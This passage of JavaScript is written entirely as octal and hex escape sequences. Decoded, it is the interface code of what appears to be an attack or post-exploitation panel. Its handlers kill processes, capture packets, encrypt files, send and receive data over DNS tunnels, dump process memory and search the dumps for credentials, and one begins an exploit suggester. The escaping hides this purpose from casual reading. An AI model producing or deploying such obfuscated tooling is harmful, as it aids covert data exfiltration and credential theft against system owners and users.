\156\x67\x3e\x24\x7b\160\x69\144\x7d\74\57\x73\x74\162\x6f\x6e\147\x3e\x3f\x60\54\x20\x7b\40\164\x79\x70\x65\x3a\40\47\144\141\x6e\x67\145\162\x27\x2c\40\x6f\153\124\x65\170\x74\72\40\47\x4b\151\154\154\47\54\x20\x63\x61\156\x63\x65\154\x54\x65\170\x74\72\x20\47\x43\141\x6e\143\x65\154\47\40\x7d\51\73\40\151\146\40\x28\41\x63\x6f\x6e\146\x69\x72\x6d\145\x64\x29\x20\162\145\164\165\x72\x6e\73\xa\x9\11\11\x63\157\x6e\x73\164\x20\x72\145\x73\x20\75\40\141\167\141\x69\164\40\x74\150\151\x73\x2e\x61\160\x69\x28\47\153\x69\x6c\x6c\137\x70\162\x6f\x63\145\163\x73\x27\x2c\x20\x7b\x20\x70\151\x64\40\175\x29\x3b\12\x9\11\11\151\146\40\x28\x72\145\163\40\46\x26\x20\x72\x65\x73\x2e\x73\164\141\164\165\163\x20\x3d\x3d\x3d\x20\x27\163\x75\x63\x63\145\x73\x73\47\51\x20\173\12\11\11\11\11\x74\150\151\163\x2e\164\x6f\x61\x73\x74\x28\140\120\x72\157\x63\145\x73\x73\40\44\173\x70\x69\x64\x7d\x20\153\151\x6c\x6c\145\x64\x2e\x60\x29\x3b\xa\11\11\x9\x9\x74\150\x69\x73\56\141\x64\144\x4e\157\x74\x69\x66\151\x63\x61\x74\x69\x6f\x6e\50\x27\120\x72\157\143\x65\163\x73\40\x4d\141\156\x61\x67\x65\162\x27\54\x20\x60\120\x72\x6f\x63\x65\x73\163\40\44\x7b\160\x69\x64\175\x20\x74\x65\x72\155\x69\156\141\164\x65\144\140\54\40\x27\x77\x61\162\156\151\156\x67\47\x29\x3b\xa\11\x9\x9\11\x74\150\151\x73\x2e\162\x65\146\x72\x65\x73\x68\120\x72\x6f\143\145\163\163\145\163\x28\51\73\xa\11\x9\11\x7d\x20\145\x6c\163\x65\x20\x7b\12\11\11\11\x9\164\150\x69\x73\56\x74\157\x61\163\164\x28\x27\x46\141\x69\154\x65\144\40\164\x6f\40\153\x69\x6c\x6c\40\160\x72\x6f\x63\x65\163\x73\x2e\x27\x2c\x20\47\145\162\x72\157\162\x27\51\73\12\11\11\11\175\12\11\x9\175\x2c\12\11\11\xa\x9\x9\x2f\x2f\40\x50\141\143\153\x65\x74\x20\103\x61\x70\164\165\x72\x65\xa\11\11\x61\163\171\x6e\x63\x20\163\164\x61\x72\164\x50\x61\143\153\x65\x74\x43\x61\160\164\x75\162\145\x28\x29\40\173\12\11\x9\11\143\157\156\x73\164\x20\151\156\x74\x65\x72\x66\x61\x63\x65\x20\75\40\144\157\x63\x75\155\x65\156\164\56\x67\145\x74\105\154\145\x6d\145\x6e\164\x42\171\111\144\50\x27\x63\x61\x70\164\x75\162\x65\55\x69\x6e\x74\x65\x72\146\141\x63\145\47\51\56\166\141\154\165\145\40\174\x7c\x20\x27\x61\x6e\171\47\x3b\12\11\x9\x9\x63\157\x6e\163\x74\40\x63\x6f\165\156\164\x20\x3d\x20\160\x61\x72\163\145\x49\x6e\164\50\x64\x6f\143\x75\155\x65\x6e\x74\x2e\x67\145\x74\x45\x6c\145\155\x65\x6e\164\x42\x79\111\x64\50\47\x63\x61\160\164\x75\162\145\55\143\157\x75\156\x74\47\51\56\166\141\154\x75\x65\x29\x20\174\x7c\x20\x35\60\x3b\12\11\11\11\143\157\156\163\x74\x20\146\151\154\164\x65\162\40\x3d\x20\144\157\143\x75\x6d\145\156\x74\x2e\147\145\164\x45\x6c\x65\x6d\145\x6e\164\x42\x79\x49\x64\50\x27\143\141\x70\164\x75\162\145\55\146\151\x6c\164\145\162\47\x29\x2e\166\x61\154\x75\145\73\12\x9\11\11\x63\x6f\x6e\163\x74\40\x6f\165\x74\x70\x75\x74\105\154\40\75\40\144\x6f\143\x75\x6d\145\156\x74\x2e\147\x65\x74\105\x6c\x65\155\145\156\164\x42\x79\111\x64\50\x27\143\x61\160\x74\165\162\145\x2d\157\165\164\x70\165\x74\x27\x29\x3b\xa\11\11\11\x6f\165\x74\160\x75\164\105\x6c\x2e\x69\x6e\156\x65\x72\124\x65\x78\164\40\75\40\x27\x53\164\x61\x72\164\x69\156\147\x20\x63\x61\160\164\165\162\145\x2e\56\x2e\47\73\xa\x9\x9\11\x63\x6f\156\x73\164\40\x72\x65\x73\x20\75\40\141\x77\141\x69\x74\x20\x74\150\151\163\x2e\141\x70\151\x28\47\x73\164\141\x72\x74\137\x70\141\143\x6b\145\x74\137\x63\141\x70\164\165\x72\x65\47\54\40\x7b\x20\x69\156\164\145\162\146\141\x63\145\x2c\40\x63\157\165\x6e\164\54\x20\x66\x69\154\x74\x65\x72\40\175\51\x3b\12\11\x9\11\151\x66\40\x28\162\x65\x73\40\46\x26\x20\162\145\163\56\x73\x74\141\164\x75\x73\40\x3d\75\x3d\40\x27\x73\x75\143\x63\x65\x73\163\47\51\40\x7b\xa\11\x9\x9\11\157\165\164\x70\165\x74\x45\x6c\x2e\x69\156\156\145\162\x54\145\x78\x74\x20\75\40\x72\145\163\x2e\x6f\165\164\x70\165\164\x20\x7c\174\x20\47\103\x61\160\164\x75\162\145\x20\143\157\x6d\x70\x6c\145\164\145\144\x2e\x27\x3b\12\11\x9\11\11\164\150\151\x73\x2e\141\x64\144\116\x6f\164\151\146\151\143\141\164\x69\x6f\156\50\47\x50\x61\143\153\145\x74\40\x43\141\160\x74\x75\x72\x65\x27\x2c\x20\x60\103\141\x70\164\165\x72\x65\x64\x20\44\173\143\x6f\x75\x6e\164\175\x20\x70\x61\143\x6b\x65\x74\x73\140\x2c\40\x27\163\165\143\x63\145\163\x73\x27\x29\73\xa\x9\x9\x9\x7d\x20\145\154\x73\x65\x20\173\xa\11\11\11\11\157\x75\164\x70\x75\x74\105\x6c\56\151\156\x6e\x65\162\124\x65\170\x74\40\x3d\x20\162\145\163\x3f\56\x6d\145\163\x73\141\147\x65\x20\174\174\40\x27\103\141\160\164\165\x72\x65\x20\x66\x61\x69\x6c\145\x64\56\x27\73\12\11\11\x9\11\x74\150\151\x73\56\x74\157\141\x73\164\50\162\x65\163\77\56\155\x65\x73\163\x61\x67\x65\x20\174\x7c\x20\x27\x43\x61\x70\164\x75\x72\x65\40\x66\141\151\154\145\x64\56\47\54\x20\47\145\x72\162\x6f\162\47\51\x3b\xa\x9\x9\11\175\xa\x9\x9\175\x2c\12\x9\11\12\11\11\57\57\40\106\x69\x6c\145\x20\105\156\x63\162\x79\160\164\151\x6f\x6e\57\104\145\x63\162\x79\160\164\151\157\x6e\xa\11\x9\141\x73\x79\x6e\143\40\x65\156\143\x72\171\x70\164\x46\151\154\145\x28\x29\40\x7b\12\11\x9\11\x63\x6f\x6e\x73\x74\40\146\x69\154\x65\x50\141\x74\x68\40\x3d\x20\x64\x6f\x63\165\x6d\145\x6e\164\x2e\x67\145\164\105\x6c\x65\155\x65\x6e\164\102\x79\111\x64\50\x27\x63\162\171\x70\164\157\x2d\x66\151\154\145\x2d\160\141\x74\x68\47\51\x2e\x76\141\154\x75\x65\x3b\12\x9\x9\11\143\157\x6e\x73\x74\x20\x70\x61\163\163\x77\157\162\144\x20\x3d\40\144\157\x63\165\x6d\x65\156\x74\56\x67\145\164\x45\154\x65\155\145\156\x74\102\x79\x49\144\50\47\143\162\171\x70\164\x6f\x2d\160\x61\163\163\167\157\x72\144\x27\51\56\x76\x61\154\x75\x65\x3b\12\11\x9\11\x69\x66\x20\50\x21\146\x69\x6c\145\120\141\x74\150\x20\x7c\174\40\x21\x70\141\x73\x73\x77\157\162\144\51\40\162\x65\x74\165\x72\x6e\x20\164\x68\x69\x73\x2e\164\x6f\141\x73\164\x28\x27\106\151\x6c\x65\40\x70\141\x74\150\x20\x61\x6e\x64\40\x70\141\x73\x73\167\x6f\x72\144\x20\141\162\x65\x20\162\x65\161\165\x69\162\145\x64\x2e\47\x2c\40\x27\145\162\162\157\x72\x27\51\x3b\xa\11\x9\x9\x63\x6f\156\x73\x74\40\x72\145\x73\40\75\40\141\x77\141\x69\164\x20\164\x68\x69\163\x2e\x61\160\151\x28\x27\145\156\x63\x72\171\160\x74\x5f\x66\151\154\x65\47\x2c\40\173\x20\146\151\154\x65\x5f\160\141\x74\x68\x3a\40\x66\x69\x6c\x65\120\x61\x74\x68\54\x20\160\x61\163\163\x77\157\162\144\x20\175\51\x3b\xa\11\11\11\x69\x66\x20\50\162\x65\163\40\46\x26\x20\x72\x65\x73\x2e\x73\164\x61\x74\x75\163\40\x3d\x3d\x3d\40\x27\163\x75\x63\x63\x65\x73\x73\47\51\x20\x7b\12\11\11\x9\11\144\157\x63\165\155\x65\156\x74\56\x67\145\164\x45\154\x65\x6d\x65\156\x74\102\x79\x49\x64\50\x27\x63\162\171\160\x74\x6f\x2d\162\x65\x73\x75\x6c\x74\163\47\51\x2e\x69\x6e\156\145\162\110\124\x4d\114\40\x3d\40\140\74\160\40\163\164\x79\154\145\75\x22\143\157\154\157\162\72\x76\x61\x72\x28\55\x2d\141\143\x63\x65\x6e\164\55\x67\162\x65\145\x6e\x29\x3b\42\76\x24\x7b\x72\x65\x73\56\x6d\x65\163\x73\141\147\145\x7d\x3c\142\162\x3e\x4f\165\x74\x70\165\164\72\40\x24\x7b\162\x65\x73\56\x6f\x75\164\x70\165\164\137\x66\151\x6c\x65\x7d\74\x2f\160\x3e\x60\73\12\11\x9\x9\11\x74\x68\151\163\x2e\x61\144\144\116\x6f\164\151\146\x69\x63\x61\164\x69\x6f\156\x28\x27\103\162\171\160\x74\157\40\x54\157\157\x6c\x73\x27\54\x20\47\106\151\x6c\x65\40\x65\156\x63\x72\171\160\164\145\144\x20\163\x75\x63\143\145\x73\x73\x66\x75\x6c\154\171\x27\x2c\x20\x27\x73\x75\143\x63\x65\x73\163\x27\x29\73\12\x9\11\11\175\40\x65\154\163\145\x20\x7b\12\11\x9\11\11\144\x6f\x63\165\155\145\156\x74\x2e\x67\x65\x74\105\x6c\x65\155\x65\156\164\x42\x79\111\x64\x28\47\x63\162\171\x70\164\x6f\55\162\x65\163\x75\x6c\x74\x73\x27\51\x2e\151\156\x6e\x65\162\x48\124\115\114\x20\75\40\140\74\x70\x20\x73\164\x79\x6c\145\x3d\x22\x63\x6f\154\157\162\x3a\x76\x61\x72\x28\x2d\x2d\x61\143\143\145\156\x74\55\x72\x65\x64\51\x3b\x22\76\x24\173\x72\x65\163\77\56\x6d\145\163\x73\141\147\145\x20\174\x7c\x20\x27\x45\156\143\162\171\160\164\151\x6f\x6e\40\146\x61\151\154\x65\x64\56\47\x7d\x3c\57\160\76\140\73\12\11\11\x9\175\xa\x9\x9\x7d\x2c\xa\x9\11\x61\x73\171\156\143\x20\x64\145\143\162\171\160\164\x46\151\x6c\x65\50\x29\x20\x7b\xa\11\x9\x9\x63\157\x6e\163\x74\40\146\151\x6c\x65\120\x61\x74\150\x20\x3d\x20\144\x6f\x63\x75\155\x65\156\164\x2e\147\x65\x74\105\x6c\x65\x6d\x65\156\164\x42\171\x49\144\50\x27\x63\162\x79\x70\164\157\x2d\146\151\x6c\145\x2d\x70\141\164\150\47\x29\x2e\x76\141\154\x75\145\x3b\xa\11\x9\11\x63\x6f\x6e\163\x74\x20\x70\141\163\163\167\x6f\x72\144\x20\x3d\x20\144\157\x63\165\155\145\156\164\x2e\x67\145\x74\105\x6c\x65\x6d\145\x6e\164\x42\171\111\144\50\x27\143\162\171\x70\164\157\55\160\x61\163\x73\x77\x6f\x72\144\47\51\x2e\166\x61\154\x75\145\x3b\12\x9\11\11\151\146\40\x28\41\146\151\x6c\x65\120\x61\x74\x68\x20\x7c\x7c\x20\41\x70\141\x73\x73\167\x6f\x72\144\x29\40\x72\145\164\x75\162\x6e\x20\164\150\151\x73\x2e\x74\x6f\141\x73\x74\50\x27\106\x69\154\x65\x20\x70\141\x74\x68\x20\x61\156\144\40\x70\141\163\163\167\x6f\x72\144\40\x61\x72\145\40\x72\x65\x71\x75\x69\162\x65\144\x2e\x27\x2c\x20\x27\x65\x72\x72\157\x72\47\x29\73\12\x9\11\x9\x63\x6f\x6e\x73\x74\x20\x72\145\x73\x20\75\40\141\167\141\151\164\40\x74\150\x69\x73\x2e\x61\x70\151\x28\47\x64\x65\x63\x72\171\160\x74\137\x66\151\154\x65\x27\x2c\40\x7b\x20\146\151\x6c\x65\x5f\x70\141\x74\150\x3a\x20\146\151\x6c\145\x50\141\164\x68\x2c\x20\x70\x61\x73\x73\x77\x6f\x72\144\40\175\51\73\12\x9\11\x9\x69\146\40\x28\x72\145\x73\40\46\x26\x20\162\145\x73\56\x73\164\141\164\x75\x73\40\75\x3d\75\40\47\x73\x75\x63\x63\x65\x73\163\x27\x29\x20\173\xa\11\x9\11\11\144\x6f\x63\165\x6d\145\156\164\x2e\x67\x65\x74\105\154\x65\155\x65\x6e\164\x42\171\111\x64\50\47\x63\x72\171\160\164\x6f\x2d\x72\x65\x73\165\154\164\x73\47\51\56\x69\156\x6e\x65\x72\110\x54\115\x4c\x20\75\40\140\x3c\160\40\163\164\x79\x6c\145\75\42\x63\x6f\154\157\x72\x3a\x76\141\x72\50\55\x2d\x61\x63\x63\x65\156\164\55\147\162\x65\x65\156\51\x3b\42\x3e\x24\x7b\162\x65\x73\x2e\155\x65\x73\163\141\147\x65\x7d\x3c\142\162\x3e\117\165\x74\160\x75\x74\x3a\40\44\173\162\x65\x73\56\157\165\164\160\x75\x74\x5f\146\151\154\x65\x7d\x3c\x2f\x70\x3e\140\73\12\x9\11\x9\x9\164\150\151\163\56\141\144\144\116\157\x74\x69\146\x69\x63\141\x74\151\x6f\x6e\50\x27\103\162\171\x70\x74\157\x20\x54\x6f\157\x6c\x73\x27\54\40\47\106\151\154\x65\40\x64\x65\x63\162\x79\160\x74\x65\144\40\x73\165\x63\143\145\163\163\146\165\154\x6c\x79\47\54\40\47\x73\165\143\143\x65\x73\x73\47\x29\x3b\xa\x9\11\x9\175\40\x65\154\163\x65\40\x7b\xa\x9\11\x9\11\144\x6f\x63\x75\x6d\x65\x6e\164\x2e\147\145\x74\x45\154\145\x6d\145\x6e\x74\102\x79\x49\x64\50\47\143\162\x79\x70\164\157\55\162\145\163\165\154\x74\163\x27\51\56\x69\156\x6e\145\x72\x48\x54\x4d\114\x20\75\x20\140\74\x70\40\x73\164\x79\x6c\145\75\42\x63\x6f\x6c\x6f\162\x3a\x76\141\x72\x28\55\55\141\143\x63\145\x6e\164\x2d\162\145\144\51\73\x22\76\x24\x7b\x72\x65\163\77\56\155\x65\163\163\141\x67\145\40\x7c\x7c\40\47\x44\145\143\162\171\160\164\x69\157\x6e\40\x66\141\x69\154\145\144\x2e\x27\x7d\x3c\x2f\160\x3e\x60\x3b\xa\11\x9\x9\x7d\12\x9\x9\x7d\x2c\12\11\11\xa\x9\11\x2f\x2f\x20\x44\x4e\x53\x20\124\165\x6e\x6e\145\x6c\x69\x6e\x67\12\11\x9\141\x73\x79\x6e\x63\x20\144\x6e\x73\124\165\156\156\145\154\x53\145\x6e\x64\50\x29\x20\x7b\12\x9\x9\11\143\x6f\156\x73\164\40\144\141\x74\x61\x20\75\x20\144\157\143\x75\x6d\145\156\164\x2e\147\145\164\x45\x6c\x65\155\145\156\x74\102\171\x49\144\50\47\x64\x6e\163\x2d\x64\141\164\x61\x27\51\56\166\141\x6c\x75\x65\x3b\12\x9\11\x9\143\x6f\x6e\x73\x74\40\144\x6f\155\141\151\x6e\x20\75\x20\144\157\x63\x75\x6d\145\156\164\x2e\x67\145\164\105\154\145\x6d\145\x6e\164\102\x79\x49\x64\50\x27\144\x6e\163\55\144\157\155\x61\x69\x6e\47\51\x2e\x76\x61\x6c\165\145\x3b\xa\11\11\x9\151\x66\40\50\41\x64\x61\164\x61\40\x7c\174\x20\41\144\x6f\x6d\x61\151\156\x29\x20\162\145\x74\165\x72\156\40\164\150\151\x73\x2e\164\x6f\x61\163\164\50\x27\104\x61\x74\141\x20\141\x6e\144\x20\144\157\x6d\141\151\156\40\141\x72\x65\x20\x72\x65\161\x75\151\x72\145\144\x2e\47\x2c\x20\47\145\x72\x72\157\162\x27\51\73\xa\x9\11\x9\143\x6f\156\x73\164\x20\x72\145\163\x20\75\x20\x61\x77\x61\151\x74\x20\164\x68\151\x73\x2e\141\160\151\x28\x27\x64\x6e\163\137\164\165\156\156\145\x6c\137\x73\145\x6e\x64\47\54\x20\173\40\144\141\x74\x61\54\40\144\157\155\x61\x69\156\40\175\x29\73\12\11\11\11\x69\x66\x20\x28\162\x65\x73\40\x26\x26\40\162\x65\163\x2e\x73\x74\x61\x74\165\x73\40\75\75\x3d\40\47\x73\165\x63\x63\145\163\163\x27\x29\40\x7b\12\11\x9\x9\x9\144\157\143\x75\x6d\145\156\x74\x2e\147\x65\x74\105\x6c\x65\155\145\156\x74\x42\171\x49\144\50\47\x64\x6e\163\55\162\145\163\x75\154\164\163\x27\51\x2e\151\x6e\x6e\145\162\124\x65\x78\164\x20\x3d\40\140\x53\x65\x6e\x74\40\44\173\x72\x65\x73\x2e\x72\145\x73\x75\154\164\x73\56\x6c\x65\156\x67\164\150\175\40\143\150\x75\x6e\153\163\x20\x76\151\141\40\104\x4e\123\x2e\134\x6e\x5c\x6e\44\x7b\x72\145\163\x2e\x72\145\163\x75\x6c\x74\163\x2e\x6d\141\x70\x28\x72\x20\75\76\x20\140\x24\x7b\x72\x2e\163\x75\x62\x64\x6f\x6d\x61\151\x6e\175\72\40\44\173\x72\56\x72\x65\x73\157\154\x76\145\144\x20\77\x20\47\x4f\113\x27\x20\72\40\47\106\x41\111\x4c\105\x44\x27\175\x60\x29\56\x6a\157\151\156\x28\x27\x5c\156\47\x29\x7d\x60\x3b\xa\x9\x9\11\x9\x74\150\151\163\x2e\141\144\144\x4e\157\164\x69\146\151\x63\141\164\x69\x6f\156\x28\x27\104\x4e\123\40\124\x75\x6e\x6e\145\x6c\151\x6e\x67\x27\x2c\40\x60\x53\145\x6e\x74\40\x24\173\x72\145\163\x2e\x72\145\x73\x75\x6c\x74\x73\56\154\x65\x6e\x67\164\150\x7d\x20\x44\116\x53\40\143\150\x75\156\x6b\x73\x60\x2c\x20\x27\163\x75\143\x63\145\x73\163\x27\x29\73\xa\x9\x9\x9\175\12\11\x9\175\54\12\x9\x9\141\163\171\x6e\x63\x20\144\156\163\124\165\x6e\156\145\x6c\x52\145\x63\x65\x69\x76\x65\x28\x29\40\173\12\x9\x9\x9\143\157\x6e\x73\164\x20\x64\157\155\141\151\156\x20\75\x20\x64\x6f\x63\x75\155\145\156\164\x2e\147\145\x74\105\154\145\x6d\145\x6e\164\x42\x79\x49\144\x28\47\x64\x6e\x73\x2d\144\157\155\141\151\x6e\x27\51\x2e\166\x61\x6c\x75\145\x3b\xa\x9\11\x9\x69\146\40\50\41\x64\x6f\x6d\x61\x69\x6e\x29\40\162\145\164\165\162\x6e\x20\x74\x68\x69\x73\x2e\164\x6f\x61\163\164\x28\47\104\x6f\155\141\151\156\40\151\x73\40\x72\x65\161\x75\x69\162\145\x64\56\47\54\x20\47\145\162\x72\x6f\162\47\x29\x3b\xa\11\11\x9\x63\x6f\156\163\x74\40\x72\145\163\40\75\40\141\167\x61\151\164\40\164\150\x69\x73\56\141\160\151\50\47\144\156\163\x5f\164\165\x6e\156\x65\154\137\162\145\x63\145\x69\x76\x65\x27\54\40\173\40\x64\x6f\155\x61\151\x6e\x20\175\x29\x3b\12\11\x9\x9\x69\x66\x20\50\162\145\x73\40\46\46\x20\162\145\163\56\163\x74\141\164\x75\163\x20\75\x3d\x3d\40\x27\x73\165\143\143\x65\x73\163\47\51\40\173\12\x9\11\11\11\x64\157\x63\x75\155\x65\156\x74\x2e\147\x65\x74\x45\154\145\155\x65\156\164\102\171\x49\x64\50\x27\144\156\163\55\162\145\x73\x75\x6c\x74\x73\47\51\x2e\151\x6e\156\145\162\124\x65\170\164\x20\75\40\140\122\x65\143\x65\151\x76\145\x64\x20\144\141\x74\x61\x3a\x5c\156\134\x6e\x24\173\x72\145\x73\x2e\x64\141\164\141\x20\x7c\174\x20\47\116\x6f\40\x64\x61\164\x61\40\x72\x65\143\145\x69\166\x65\x64\x27\x7d\x5c\x6e\x5c\x6e\x52\x61\x77\72\x20\44\173\x72\x65\x73\56\x72\x61\x77\x20\x7c\174\x20\47\116\x2f\101\x27\175\x60\73\xa\11\11\11\11\164\150\151\163\x2e\141\144\x64\x4e\x6f\164\151\146\x69\x63\x61\164\x69\157\156\50\47\x44\x4e\123\x20\124\x75\156\156\x65\x6c\151\x6e\x67\x27\x2c\x20\47\104\141\x74\x61\x20\x72\145\x63\145\151\166\145\x64\40\166\151\141\x20\104\116\123\47\x2c\40\47\163\x75\143\x63\145\x73\163\x27\x29\73\xa\x9\11\11\x7d\12\x9\11\175\54\12\x9\x9\xa\x9\x9\57\57\40\115\x65\x6d\157\162\171\x20\104\x75\x6d\x70\x20\x41\156\x61\154\171\172\x65\x72\xa\11\11\141\163\171\156\x63\x20\144\x75\x6d\x70\115\x65\155\x6f\x72\x79\x28\x29\40\x7b\12\11\11\x9\143\x6f\156\163\x74\x20\160\151\x64\40\x3d\40\x70\x61\x72\163\x65\111\156\164\50\x64\x6f\143\x75\155\x65\x6e\164\56\x67\145\164\105\x6c\x65\155\145\156\x74\102\x79\x49\144\x28\47\x6d\x65\155\x64\x75\155\x70\55\x70\x69\x64\47\x29\56\x76\141\x6c\x75\145\x29\73\12\x9\x9\x9\151\x66\40\x28\41\160\x69\144\x29\x20\162\x65\164\165\162\x6e\40\x74\150\151\x73\56\164\x6f\x61\x73\164\x28\47\x50\111\104\40\x69\163\x20\162\x65\x71\165\x69\162\145\x64\56\x27\x2c\x20\x27\x65\162\162\x6f\162\x27\x29\x3b\12\x9\11\11\x63\157\156\163\x74\40\x6f\165\164\x70\x75\x74\x45\x6c\x20\75\40\144\157\143\x75\x6d\145\156\x74\56\x67\145\x74\105\154\x65\155\x65\156\x74\x42\x79\x49\x64\x28\x27\155\145\155\144\165\155\x70\55\x6f\165\164\x70\x75\164\47\x29\73\xa\11\x9\x9\x6f\x75\164\160\165\x74\105\154\56\x69\156\x6e\145\162\x54\x65\170\164\40\75\40\x60\104\x75\x6d\x70\x69\156\x67\40\155\145\x6d\x6f\x72\x79\x20\146\x6f\x72\x20\120\x49\x44\40\44\x7b\x70\x69\x64\175\56\x2e\x2e\140\73\xa\11\x9\x9\143\157\x6e\163\x74\x20\x72\x65\163\x20\x3d\40\x61\167\141\x69\164\x20\164\x68\151\x73\x2e\141\160\151\x28\x27\144\x75\x6d\x70\137\x70\x72\x6f\143\145\163\x73\137\x6d\x65\155\x6f\x72\x79\x27\54\x20\x7b\x20\x70\x69\x64\40\x7d\51\x3b\12\11\x9\x9\x69\146\40\50\x72\x65\x73\x20\x26\46\40\162\145\x73\56\163\x74\x61\x74\165\x73\x20\75\x3d\x3d\x20\x27\163\x75\143\x63\145\x73\x73\x27\51\40\173\12\x9\x9\x9\11\157\165\164\160\x75\x74\x45\x6c\x2e\151\x6e\x6e\x65\x72\124\x65\170\x74\x20\75\40\140\44\173\x72\145\x73\x2e\x6d\145\x73\163\x61\x67\145\175\134\156\x5c\156\44\173\162\145\x73\x2e\x6f\x75\164\160\x75\164\175\134\156\134\x6e\44\173\162\145\163\56\146\x69\154\145\x20\x3f\40\140\104\x75\155\x70\40\x66\x69\154\145\72\40\x24\173\x72\x65\x73\56\146\151\x6c\x65\175\40\x28\x24\x7b\162\145\x73\x2e\x73\151\x7a\x65\175\x20\142\x79\x74\145\163\x29\140\x20\72\40\x27\x27\x7d\x60\x3b\xa\x9\11\x9\x9\x69\x66\x20\50\162\145\163\56\x66\x69\x6c\x65\51\x20\x64\x6f\x63\165\155\x65\x6e\x74\x2e\x67\145\x74\105\154\145\155\x65\x6e\164\102\x79\111\x64\50\x27\155\145\x6d\x64\x75\155\160\x2d\x66\x69\154\145\x27\x29\56\166\x61\x6c\x75\x65\40\x3d\40\x72\145\163\56\x66\151\x6c\x65\73\12\x9\x9\11\11\x74\x68\151\x73\56\141\x64\x64\116\x6f\164\x69\146\x69\143\x61\164\x69\x6f\156\x28\x27\x4d\145\155\x6f\x72\171\40\x41\x6e\x61\154\x79\172\x65\x72\47\54\40\140\115\x65\x6d\157\162\171\40\x64\x75\x6d\x70\145\144\x20\146\x6f\162\x20\x50\111\x44\40\x24\x7b\160\151\144\175\140\54\40\x27\x73\x75\x63\143\x65\x73\163\47\51\x3b\12\11\x9\x9\x7d\x20\x65\x6c\x73\145\x20\x7b\12\x9\x9\x9\11\157\x75\x74\160\165\x74\x45\x6c\56\x69\156\156\145\162\124\145\170\x74\40\x3d\x20\x72\145\x73\x3f\x2e\155\x65\163\163\141\147\145\40\174\x7c\40\x27\x44\x75\155\160\x20\146\x61\151\x6c\145\144\56\x27\x3b\xa\x9\x9\x9\x7d\12\11\11\x7d\x2c\xa\11\x9\x61\163\x79\156\143\40\x61\156\141\x6c\x79\x7a\x65\x4d\145\x6d\157\x72\x79\x28\x29\40\x7b\12\x9\11\11\x63\x6f\156\163\x74\40\146\151\154\145\120\141\164\x68\x20\75\x20\x64\x6f\143\165\x6d\x65\156\164\x2e\147\145\164\105\154\x65\155\145\x6e\164\102\x79\x49\x64\x28\x27\155\x65\155\144\x75\155\160\55\x66\151\154\145\47\51\56\x76\141\x6c\x75\145\x3b\xa\11\x9\11\143\157\156\163\164\40\x70\141\x74\164\145\x72\156\x20\75\x20\x64\157\x63\165\x6d\145\x6e\x74\x2e\147\x65\x74\105\154\145\x6d\145\x6e\x74\x42\x79\x49\144\x28\47\155\x65\x6d\144\165\155\160\55\160\x61\x74\164\145\162\156\x27\51\x2e\166\141\154\x75\x65\x3b\xa\11\x9\x9\151\146\40\x28\x21\x66\151\154\x65\x50\141\164\x68\51\40\x72\145\x74\165\162\x6e\40\164\x68\151\x73\56\x74\x6f\141\163\x74\50\x27\x44\x75\155\x70\x20\146\x69\x6c\145\x20\x70\141\x74\x68\40\151\163\40\x72\145\x71\165\x69\162\145\x64\56\x27\x2c\40\x27\x65\x72\162\157\x72\47\x29\73\xa\11\11\x9\143\157\x6e\163\x74\x20\157\165\x74\160\165\x74\x45\x6c\x20\x3d\40\x64\157\x63\x75\x6d\145\156\x74\x2e\147\x65\x74\105\154\145\x6d\145\x6e\164\x42\x79\111\144\x28\47\x6d\145\x6d\x64\x75\155\x70\x2d\157\165\164\x70\165\x74\47\x29\x3b\xa\11\11\x9\157\165\164\x70\x75\164\x45\x6c\x2e\x69\x6e\x6e\x65\x72\x54\x65\170\164\40\x3d\40\x27\x41\156\x61\154\171\x7a\151\x6e\147\40\x6d\x65\155\157\x72\171\40\144\x75\x6d\160\x2e\56\56\47\x3b\xa\11\x9\x9\x63\x6f\x6e\163\164\x20\162\x65\163\x20\x3d\x20\x61\x77\141\x69\164\x20\x74\x68\x69\163\x2e\141\x70\x69\x28\x27\x61\x6e\141\x6c\171\172\x65\x5f\x6d\x65\x6d\x6f\162\171\x5f\144\165\x6d\160\47\x2c\x20\x7b\40\x66\151\154\145\x5f\x70\x61\164\150\72\x20\146\151\154\145\120\141\x74\x68\54\40\160\141\164\x74\x65\x72\156\40\x7d\51\73\12\x9\x9\x9\x69\x66\x20\x28\162\x65\163\40\x26\x26\x20\162\x65\163\56\163\x74\x61\x74\x75\x73\40\75\75\75\x20\x27\x73\165\x63\143\145\163\x73\47\51\40\173\12\x9\11\x9\x9\x63\157\156\163\x74\40\162\40\75\40\162\x65\x73\x2e\x72\x65\x73\x75\154\x74\x73\x3b\xa\11\11\11\11\157\165\164\x70\x75\164\105\154\56\x69\156\x6e\145\162\x54\145\x78\164\40\75\40\140\123\151\x7a\145\x3a\40\x24\x7b\162\56\x73\x69\172\145\175\40\142\x79\164\145\x73\x5c\x6e\134\156\x53\164\162\x69\x6e\x67\163\x20\146\x6f\165\156\144\40\50\x66\151\x72\x73\164\x20\61\60\x30\x29\72\x5c\156\x24\x7b\x72\56\x73\x74\x72\151\x6e\147\x73\56\163\x6c\151\143\145\x28\60\54\40\x32\60\51\x2e\x6a\x6f\151\156\50\47\134\x6e\47\x29\175\x5c\156\134\x6e\x24\173\x72\56\143\162\145\144\x65\156\164\151\141\154\163\56\154\145\x6e\x67\x74\x68\x20\x3e\x20\x30\40\x3f\40\x60\103\x72\145\144\145\156\164\151\x61\x6c\163\40\146\x6f\165\156\144\72\x5c\156\44\x7b\162\56\x63\162\x65\144\145\x6e\164\151\x61\154\163\56\152\x6f\151\x6e\50\47\134\156\x27\x29\x7d\x60\x20\72\40\x27\116\157\x20\x63\162\145\x64\145\x6e\164\151\x61\x6c\163\x20\146\157\165\x6e\144\56\47\x7d\140\73\xa\x9\x9\11\x9\164\150\x69\x73\56\x61\x64\144\116\x6f\164\151\x66\151\x63\x61\x74\x69\x6f\x6e\50\x27\x4d\x65\x6d\157\x72\171\40\x41\156\x61\154\171\x7a\145\x72\47\54\x20\47\115\x65\155\157\x72\171\x20\x64\165\155\x70\40\141\156\x61\x6c\171\x7a\145\144\47\x2c\40\x27\163\x75\143\x63\145\x73\163\x27\51\73\12\x9\11\x9\x7d\x20\145\154\163\145\40\173\xa\x9\11\11\11\x6f\x75\x74\x70\165\x74\105\154\56\151\x6e\x6e\145\162\124\x65\x78\164\x20\x3d\x20\162\145\x73\77\x2e\155\145\x73\x73\141\x67\145\x20\x7c\x7c\x20\47\101\x6e\141\x6c\x79\163\151\163\40\146\141\151\154\145\144\x2e\x27\73\12\x9\x9\x9\x7d\xa\11\x9\x7d\54\12\x9\11\12\11\11\57\x2f\40\105\x78\x70\154\x6f\151\164\x20\123\165\x67\x67\145\163\x74\x65\x72\xa\11\11\x61\163\x79\x6e\143\x20\163\x75\x67\x67\145\163\1